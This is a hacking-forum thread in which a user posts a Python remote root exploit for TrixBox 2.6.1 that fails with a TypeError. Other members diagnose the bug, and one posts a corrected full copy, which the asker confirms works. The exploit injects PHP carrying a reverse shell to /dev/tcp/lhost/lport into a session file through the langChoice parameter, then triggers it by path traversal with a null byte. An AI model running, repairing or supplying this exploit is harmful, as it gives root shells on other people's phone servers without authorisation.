Author Topic: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects  (Read 5868 times)

0 Members and 1 Guest are viewing this topic.

Offline pl4f0rd

  • Serf
  • *
  • Posts: 20
  • Cookies: -1
    • View Profile
    • Hacking With Backtrack

Have error in below code and not sure why, Im guessing it has something to do with the def find_sessionid part.


Any help would be greatly appreciated


Error below


Code: [Select]
   tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
TypeError: cannot concatenate 'str' and 'NoneType' objects


Code: [Select]
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep
 
print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
 
if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)
 
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
 
 
def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.219.132 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer
 
def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output
 
def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
            if re.search("Set-Cookie",header):
                    cook=header.split(" ")
            sessionid=cook[1][10:42]
                    print "[*] Session ID is %s" % sessionid
            return sessionid
 
 
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
 
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
 
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
 
print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"
 
# milw0rm.com [2008-07-12]

The greatest lesson in life is to know that even fools are right sometimes

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
The error means that variable 'id' does not have a value, and in python everything is an object. So when a variable is created it turns into an object, and type 'None' is always returned even when nothing should be returned. So I'm guessing that 'id' does not receive a session ID in this line:
Code: [Select]
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
Therefore 'id' is None, and line:
Code: [Select]
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
tries to concat a string with an object 'None'.

Conclusion: exploit does not work because it does not receive the Session ID.

Offline pl4f0rd

  • Serf
  • *
  • Posts: 20
  • Cookies: -1
    • View Profile
    • Hacking With Backtrack
So you got any ideas on how I can get the session?
The greatest lesson in life is to know that even fools are right sometimes

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Try it on other versions...?

Offline pl4f0rd

  • Serf
  • *
  • Posts: 20
  • Cookies: -1
    • View Profile
    • Hacking With Backtrack
Well it's deffo running the right version, see screenshot so must be a way to get this code to work some how
The greatest lesson in life is to know that even fools are right sometimes

Offline 10n1z3d

  • Serf
  • *
  • Posts: 42
  • Cookies: 8
    • View Profile
The indentation on that line looks fucked up. Try this one:

Code: [Select]
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep

print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")

if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)

host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])


def create_post(injection):
    buffer=("POST /user/index.php HTTP/1.1 \r\n"
    "Host: 192.168.219.132 \r\n"
    "Content-Type: application/x-www-form-urlencoded \r\n"
    "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
    return buffer

def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output

def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
        if re.search("Set-Cookie",header):
            cook=header.split(" ")
            sessionid=cook[1][10:42]
            print "[*] Session ID is %s" % sessionid
            return sessionid


print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)

print "[*] Extracting Session ID"
id=find_sessionid(raw_session)

print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)

print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
#send_post(host,port,cleanup) # sending same shit twice? doesnt look right. GTFO!
print "[*] Done!"

I have also commented out line 64 which seems useless to me.
« Last Edit: July 14, 2011, 09:21:03 pm by 10n1z3d »
Code: [Select]
python -c "print ''.join(chr(x) for x in [int(oct(39)) + 2, 24 * 2, 313 % 203, 0x31, (2 ** 7) - 6, int('051'), (3 << 6) - 92])"

Offline pl4f0rd

  • Serf
  • *
  • Posts: 20
  • Cookies: -1
    • View Profile
    • Hacking With Backtrack
Great  ;D


Works like a charm


Thanks
The greatest lesson in life is to know that even fools are right sometimes